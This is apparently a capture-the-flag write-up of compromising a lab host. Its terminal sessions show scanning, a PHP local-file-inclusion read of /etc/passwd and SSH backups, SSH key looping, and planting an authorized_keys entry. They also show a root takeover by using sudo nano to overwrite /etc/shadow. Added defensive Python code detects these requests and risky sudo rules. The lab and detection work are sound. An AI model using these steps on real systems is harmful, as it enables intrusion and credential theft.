┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat allports.nmap
# Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55
Nmap scan report for 10.150.150.55
Host is up (0.032s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              13 Jun 12  2020 test
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.66.66.42
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
1055/tcp open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 53m37s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-17T08:57:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Feb 18 08:27:26 2021
URL_BASE: http://10.150.150.55/
WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 10000

---- Scanning URL: http://10.150.150.55/ ----
+ http://10.150.150.55/trick.php (CODE:200|SIZE:0)
+ http://10.150.150.55/info.php (CODE:200|SIZE:70050)
+ http://10.150.150.55/??????.php (CODE:200|SIZE:10918)
+ http://10.150.150.55/?????.php (CODE:200|SIZE:10918)

-----------------
END_TIME: Thu Feb 18 08:32:58 2021
DOWNLOADED: 10000 - FOUND: 4
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat trick.php
<?php include($_GET['page']); ?>
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST --data "file=browser.php" 10.150.150.55/info.php
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $smbclient -L 10.150.150.55 -U "" -N

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (ubuntu server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
trick.php?page=index.html
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php
And in that source you then find:
index.php?path=/
=> http://10.150.150.55/index.php?path=/
http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $ls -la
total 256
drwxr-xr-x 1 user user    138 Feb 17 10:55 .
drwxr-xr-x 1 user user   2034 Feb 17 08:02 ..
-rw-r--r-- 1 user user   1617 Feb 17 08:03 allports.nmap
-rw-r--r-- 1 user user  56184 Feb 17 10:45 browser.php
-rw-r--r-- 1 user user      6 Feb 17 08:05 hallo.txt
-rw-r--r-- 1 user user   4694 Feb 17 10:24 index.php
-rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz
-rw-r--r-- 1 user user     13 Feb 17 08:06 test
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--
100  4128  100  4128    0     0  58971      0 --:--:-- --:--:-- --:--:-- 58971
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
gary:x:1001:1001::/home/gary:/bin/sh
john:x:1002:1002::/home/john:/bin/sh
sally:x:1003:1003::/home/sally:/bin/sh
alice:x:1004:1004::/home/alice:/bin/sh
ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin
ftpuser:x:1005:1005::/home/ftpuser:/bin/sh
Debian-snmp:x:128:136::/var/lib/snmp:/bin/false
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
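A defender-side check for the two file-read sinks used above (trick.php?page= and index.php?path=): an added example, not part of the original writeup, that scans Apache access-log lines for stream wrappers, dot-dot traversal or absolute paths in those parameters. The log lines, client IP, sizes and timestamps are constructed; the parameter names and request shapes come from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache access-log lines mirroring the requests made above
# (client IP, timestamps and sizes are made up).
SAMPLE_LOG = """\
10.66.66.42 - - [17/Feb/2021:10:20:01 +0000] "GET /trick.php?page=index.html HTTP/1.1" 200 10918 "-" "curl/7.74.0"
10.66.66.42 - - [17/Feb/2021:10:24:13 +0000] "GET /trick.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 6260 "-" "curl/7.74.0"
10.66.66.42 - - [17/Feb/2021:10:55:40 +0000] "GET /index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz HTTP/1.1" 200 183770 "-" "curl/7.74.0"
10.66.66.42 - - [17/Feb/2021:11:02:07 +0000] "GET /trick.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fetc%2Fpasswd HTTP/1.1" 200 5504 "-" "curl/7.74.0"
10.66.66.42 - - [17/Feb/2021:11:05:00 +0000] "GET /index.php?path=../../../../etc/passwd HTTP/1.1" 200 4128 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Query parameters the two scripts on this box feed into include()/file reads.
WATCHED_PARAMS = {"page", "path"}

# Values a page/path parameter should never carry: stream wrappers,
# dot-dot traversal, or an absolute filesystem path.
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|file|glob)://", re.I)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def classify_value(value):
    """Label one parameter value ('php-wrapper', 'traversal', 'absolute-path') or None if benign."""
    v = unquote(value)  # parse_qs decoded once; decode again to catch double encoding
    if WRAPPER_RE.search(v):
        return "php-wrapper"
    if TRAVERSAL_RE.search(v):
        return "traversal"
    if v.startswith("/"):
        return "absolute-path"
    return None


def scan_access_log(text):
    """Return (line_no, param, decoded_value, label) for each suspicious watched parameter."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            if param in WATCHED_PARAMS:
                for value in values:
                    label = classify_value(value)
                    if label:
                        findings.append((no, param, unquote(value), label))
    return findings
```

Running `scan_access_log(SAMPLE_LOG)` flags lines 2 to 5 and leaves the plain `page=index.html` request alone; the same function can be pointed at a real access.log read from disk.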
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i $key; done
And then the same for the other users (gary, sally and alice):
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i $key; done
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt' | base64 -d > FLAG79.txt
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9I2y+p4cBMuaydINICFfYW7EFhDJA0DaLxokCz5UutruL+oNA2oJmeAqdK1CaHyfQd56TSnzCruadO3mOCjzCLBuxDxYTJxsOpOaaJP/fUfFrUG2A1rqQzxXYy6ylQEJzyN+bdO5U3C7HpY7W5LMRZls8bw8YhO+PMZVS7Nv6z/+iDbqk56RyG2yDcb8aJDX3WTv0jTMbNRCUfn2dZzoXymGbZcKpUd2ep4u+G4wHOceDHxAAB2bPZYIJcEsTsmDjtKueJCb9deOOWtZ/Y9ZLmnA807KiHhbAquiWTazNNFiFrKQv0/aJpW9q19ZYRE1GUz6WNLcYFJsbBzLWmjTXMoHIBtNVnd0KuRYKubRNcENNIg2IebCdV5NcYuzE8+AUGyIR8EAmZ4s8XCWMk/yj1kPep+PcyHMj+QaP6kn3i1ub2As39K6WB6txDo4CzIv3EFWprtRX3o43/ItSLVmhTK2QVfgEcefAyCV52b8LKvjPJ0QZB1Ka2L5ogagc9XU= root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log
User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano
$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password:
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#
root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#
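The `sudo -l` output above is what a sudoers audit should catch: an added example (not from the writeup) that parses that output and flags NOPASSWD entries running an editor as root, since an editor run as root can rewrite /etc/shadow exactly as shown. The editor list is an assumption, a starting point rather than a complete one.

```python
import re

# Constructed copy of the `sudo -l` output shown above; the box's real output has this shape.
SUDO_L_OUTPUT = """\
Matching Defaults entries for john on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin,
    logfile=/var/log/sudo.log

User john may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/nano
"""

# Editors run as root can open and save any file, /etc/shadow included.
# Assumed starting list for the audit, not an exhaustive one.
FILE_WRITE_CAPABLE = {"nano", "vi", "vim", "pico"}

# One rule line: "(runas[:rungroup]) TAG: TAG: command [args]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from the 'may run' section of `sudo -l` output."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_cmds = True
            continue
        if not in_cmds:
            continue
        m = ENTRY_RE.match(line)
        if m:
            tags = {t.strip(": ") for t in m.group("tags").split()}
            entries.append((m.group("runas"), tags, m.group("cmd").strip()))
    return entries


def risky_entries(text):
    """Entries that let the user run an editor as root with no password: an effective root file write."""
    out = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        as_root = runas.split(":")[0].strip() in ("ALL", "root")
        if as_root and "NOPASSWD" in tags and binary in FILE_WRITE_CAPABLE:
            out.append((runas, cmd))
    return out
```

On this box `risky_entries(SUDO_L_OUTPUT)` returns the single nano entry; the fix on the defending side is to drop the rule or replace it with a constrained command (sudoedit on a named file, for example) that cannot reach /etc/shadow.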
Author : Puckiestyle
Hi,
Thanks for the writeup.
Actually, if I can log in with ssh into all accounts (except john), I do not understand how I can create the authorized_keys in john’s directory (no rights).
Can you explain, please?
If you ssh into gary, you will see that the chatBackup file says that both John and Sally are network admins, which can help with ssh access. So when using the above for loop you can get Sally's id_rsa key and log in with it, then switch to john's home directory; using ls -la you will see the .ssh directory (only accessible by john or the netAdmin group). Then on your own machine you can use a tool (ssh-keygen) to create an ssh key pair and overwrite the authorized_keys in john's .ssh directory with the new public key you created; then you can ssh to john using the private key.